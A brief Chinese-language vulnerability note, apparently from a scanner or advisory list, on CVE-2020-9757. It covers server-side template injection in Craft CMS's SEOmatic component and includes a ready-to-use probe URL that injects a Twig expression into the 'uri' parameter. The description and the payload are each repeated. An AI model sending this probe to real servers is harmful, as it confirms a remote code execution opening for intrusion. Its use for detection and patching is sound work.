CVE-2020-9757(Craft CMS 遠程代碼執行漏洞)
Craft CMS 3.3.0 之前的 SEOmatic 組件允許服務器端模板注入,通過將畸形數據發送到元容器控制器導致 RCE。
/actions/seomatic/meta-container/meta-link-container/?uri={{41646*'40289'}}
Craft CMS 3.3.0 之前的 SEOmatic 組件允許服務器端模板注入,通過將畸形數據發送到元容器控制器導致 RCE。
/actions/seomatic/meta-container/meta-link-container/?uri={{41646*'40289'}}